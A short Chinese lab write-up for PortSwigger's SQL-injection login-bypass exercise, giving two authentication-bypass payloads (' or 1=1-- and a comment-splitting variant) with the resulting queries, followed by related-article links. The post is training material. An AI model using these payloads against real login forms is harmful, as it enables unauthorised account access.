burpsuite靶场----SQL注入2----万能密钥

靶场链接

https://portswigger.net/web-security/sql-injection/lab-login-bypass

推荐burpsuite插件

https://github.com/smxiazi/xia_sql

正式开始

1.点击my account

2.对登录框进行SQL语句猜测
SELECT * FROM USERS WHERE USERNAME='' AND PASSWORD=''
3.插入payload
payload1:
username:' or 1=1-- password:随便(例如222)
SELECT * FROM USERS WHERE USERNAME='' or 1=1--' AND PASSWORD='222'
后面--表示是注释,所以成功永真
payload2:
username:' or 1=1/* password:/ or '1'='1
SELECT * FROM USERS WHERE USERNAME='' or 1=1/' AND PASSWORD='*/ or '1'='1'
去除注释里的内容后
SELECT * FROM USERS WHERE USERNAME='' or 1=1 or '1'='1'

本栏目推荐文章
• SQL Server 检测是不是数字型数据的两种方法
• SQL Join的一些总结
• SQL Server 高性能写入的一些总结
• 网络攻击技术开篇——SQL Injection
• SQL SERVER日期时间转字符串
• sql server 保留2位小数
• DBEAVER 23.0.2 调整SQL编辑器字体大小 ver:20240112
• 用友 U9 【料品表】全字段Sql输出
• sql server 2012配置备份
• SQL Server 数据库备份成sql文件

靶场 密钥 burpsuite SQL靶场 密钥burpsuite sql 靶场burpsuite信息sql 靶场burpsuite数据sql 靶场burpsuite where sql 靶场burpsuite order sql 靶场burpsuite目录 靶场burpsuite信息 靶场burpsuite xss xss1 靶场burpsuite时间oracle 靶场burpsuite服务器ssrf